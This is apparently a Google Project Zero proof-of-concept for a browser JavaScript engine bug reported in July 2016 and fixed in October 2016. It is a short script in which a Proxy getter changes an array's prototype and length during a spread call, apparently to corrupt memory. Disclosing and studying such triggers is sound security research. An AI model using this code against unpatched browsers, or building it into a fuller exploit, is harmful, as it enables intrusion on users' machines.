- Report: July 2016
- Fix: Oct 2016
- Credit: Richard Zhu
- PoC by Natalie Silvanovich, Google Project Zero
var y = 0;
var t = [1,2,3];
var t2 = [4,4,4];
var mp = new Proxy(t2, {
get: function (oTarget, sKey) {
var a = [1,2];
a.reverse();
//alert("get " + sKey.toString());
//alert(oTarget.toString());
y = y + 1;
if(y == 2){
var temp = [];
oTarget.__proto__ = temp.__proto__;
t.length = 10000;
temp.fill.call(t, 7, 0, 1000);
return 5;
}
return oTarget[sKey] || oTarget.getItem(sKey) || undefined;
},
set: function (oTarget, sKey, vValue) {
//alert("set " + sKey);
if (sKey in oTarget) { return false; }
return oTarget.setItem(sKey, vValue);
},
deleteProperty: function (oTarget, sKey) {
//alert("delete");
if (sKey in oTarget) { return false; }
return oTarget.removeItem(sKey);
},
enumerate: function (oTarget, sKey) {
//alert("enum");
return oTarget.keys();
},
ownKeys: function (oTarget, sKey) {
//alert("ok");
return oTarget.keys();
},
has: function (oTarget, sKey) {
//alert("has" + sKey);
return true;
},
defineProperty: function (oTarget, sKey, oDesc) {
//alert("dp");
if (oDesc && "value" in oDesc) { oTarget.setItem(sKey, oDesc.value); }
return oTarget;
},
getOwnPropertyDescriptor: function (oTarget, sKey) {
//alert("fopd");
var vValue = oTarget.getItem(sKey);
return vValue ? {
value: vValue,
writable: true,
enumerable: true,
configurable: false
} : undefined;
},
});
function f(a){
//alert(a);
}
var q = f;
t.length = 4;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
//alert('get!');
return temperature;
}
});
t.__proto__ = mp;
//t.__proto__.__proto__ = o;
q(...t);